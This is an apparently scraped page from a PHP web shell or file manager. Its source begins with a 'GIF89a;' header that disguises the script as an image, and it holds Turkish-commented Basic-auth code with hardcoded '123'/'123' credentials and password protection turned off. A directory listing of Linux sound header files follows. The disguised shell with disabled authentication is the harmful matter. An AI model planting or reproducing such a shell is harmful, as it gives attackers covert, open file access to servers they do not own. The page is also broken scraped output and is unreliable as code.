GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| sof | --- | October 21 2025 06:29:22. | 0755 | ||
| asequencer.h | 21.34 KB | October 01 2025 09:49:04. | 0644 | ||
| asoc.h | 22.05 KB | October 01 2025 09:49:04. | 0644 | ||
| asound.h | 49.84 KB | October 01 2025 09:49:04. | 0644 | ||
| asound_fm.h | 4.27 KB | October 01 2025 09:49:04. | 0644 | ||
| compress_offload.h | 6.58 KB | October 01 2025 09:49:04. | 0644 | ||
| compress_params.h | 17.76 KB | October 01 2025 09:49:04. | 0644 | ||
| emu10k1.h | 16.93 KB | October 01 2025 09:49:04. | 0644 | ||
| firewire.h | 3.17 KB | October 01 2025 09:49:04. | 0644 | ||
| hdsp.h | 2.74 KB | October 01 2025 09:49:04. | 0644 | ||
| hdspm.h | 5.09 KB | October 01 2025 09:49:04. | 0644 | ||
| sb16_csp.h | 4.20 KB | October 01 2025 09:49:04. | 0644 | ||
| sfnt_info.h | 7.32 KB | October 01 2025 09:49:04. | 0644 | ||
| skl-tplg-interface.h | 5.20 KB | October 01 2025 09:49:04. | 0644 | ||
| snd_sst_tokens.h | 11.99 KB | October 01 2025 09:49:04. | 0644 | ||
| tlv.h | 4.49 KB | October 01 2025 09:49:04. | 0644 | ||
| usb_stream.h | 1.89 KB | October 01 2025 09:49:04. | 0644 |